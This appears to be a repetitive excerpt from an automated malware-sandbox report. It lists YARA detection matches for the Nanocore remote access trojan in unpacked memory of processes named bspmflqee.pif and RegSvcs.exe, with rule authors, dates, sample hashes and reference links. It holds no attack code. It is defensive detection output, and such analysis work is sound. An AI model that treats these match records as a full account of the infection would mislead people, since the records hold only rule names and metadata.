        Source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 32.2.RegSvcs.exe.3a29650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.3a29650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.3a29650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.3a29650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.48b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.48b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.RegSvcs.exe.2bf9650.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.2bf9650.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
